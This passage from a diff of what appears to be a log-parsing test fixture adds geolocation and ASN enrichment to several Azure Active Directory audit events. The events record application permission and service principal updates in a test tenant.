"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4248,6 +4524,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4392,7 +4680,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124967100Z", + "ingested": "2021-12-14T14:48:43.176650792Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4419,6 +4707,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4572,7 +4872,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124973800Z", + "ingested": "2021-12-14T14:48:43.176651494Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7823970Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793206\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"606ae654-e71e-4a6b-a07c-85acd775667b\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4599,6 +4899,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4765,7 +5077,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124980600Z", + "ingested": "2021-12-14T14:48:43.176652120Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4792,6 +5104,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4958,7 +5282,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124987500Z", + "ingested": "2021-12-14T14:48:43.176653071Z", "original": 